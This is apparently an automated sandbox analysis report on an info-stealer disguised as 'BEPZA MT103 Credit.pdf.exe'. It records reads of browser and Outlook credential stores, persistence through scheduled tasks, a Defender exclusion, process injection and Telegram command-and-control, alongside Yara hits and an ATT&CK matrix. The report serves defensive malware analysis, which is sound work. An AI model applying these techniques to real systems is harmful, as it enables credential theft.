                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeQueries volume information: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeQueries volume information: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeQueries volume information: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3710700225.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR
                    Source: Yara matchFile source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3710700225.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR
                    Source: Yara matchFile source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Native API
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Web Service
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    1
                    Scheduled Task/Job
                    111
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    13
                    System Information Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job
                    Logon Script (Windows)1
                    Scheduled Task/Job
                    13
                    Obfuscated Files or Information
                    Security Account Manager11
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    11
                    Encrypted Channel
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model1
                    Input Capture
                    3
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets31
                    Virtualization/Sandbox Evasion
                    SSHKeylogging14
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Masquerading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                    Virtualization/Sandbox Evasion
                    DCSync1
                    System Network Configuration Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                    Process Injection
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1665813 Sample: BEPZA MT103 Credit.pdf.exe Startdate: 15/04/2025 Architecture: WINDOWS Score: 100 50 reallyfreegeoip.org 2->50 52 api.telegram.org 2->52 54 2 other IPs or domains 2->54 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 66 17 other signatures 2->66 8 BEPZA MT103 Credit.pdf.exe 7 2->8         started        12 YEGIgzyAhkvT.exe 5 2->12         started        signatures3 62 Tries to detect the country of the analysis system (by using the IP) 50->62 64 Uses the Telegram API (likely for C&C communication) 52->64 process4 file5 36 C:\Users\user\AppData\...\YEGIgzyAhkvT.exe, PE32 8->36 dropped 38 C:\Users\...\YEGIgzyAhkvT.exe:Zone.Identifier, ASCII 8->38 dropped 40 C:\Users\user\AppData\Local\...\tmp3E23.tmp, XML 8->40 dropped 42 C:\Users\...\BEPZA MT103 Credit.pdf.exe.log, ASCII 8->42 dropped 68 Adds a directory exclusion to Windows Defender 8->68 70 Injects a PE file into a foreign processes 8->70 14 powershell.exe 23 8->14         started        17 BEPZA MT103 Credit.pdf.exe 15 2 8->17         started        20 schtasks.exe 1 8->20         started        72 Antivirus detection for dropped file 12->72 74 Multi AV Scanner detection for dropped file 12->74 22 YEGIgzyAhkvT.exe 14 2 12->22         started        24 schtasks.exe 1 12->24         started        26 YEGIgzyAhkvT.exe 12->26         started        signatures6 process7 dnsIp8 76 Loading BitLocker PowerShell Module 14->76 28 WmiPrvSE.exe 14->28         started        30 conhost.exe 14->30         started        44 checkip.dyndns.com 132.226.247.73, 49689, 49693, 80 UTMEMUS United States 17->44 46 reallyfreegeoip.org 104.21.80.1, 443, 49695, 49696 CLOUDFLARENETUS United States 17->46 32 conhost.exe 20->32         started        48 api.telegram.org 149.154.167.220, 443, 49698, 49699 TELEGRAMRU United Kingdom 22->48 78 Tries to steal Mail credentials (via file / registry access) 22->78 80 Tries to harvest and steal browser information (history, passwords, etc) 22->80 34 conhost.exe 24->34         started        signatures9 process10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.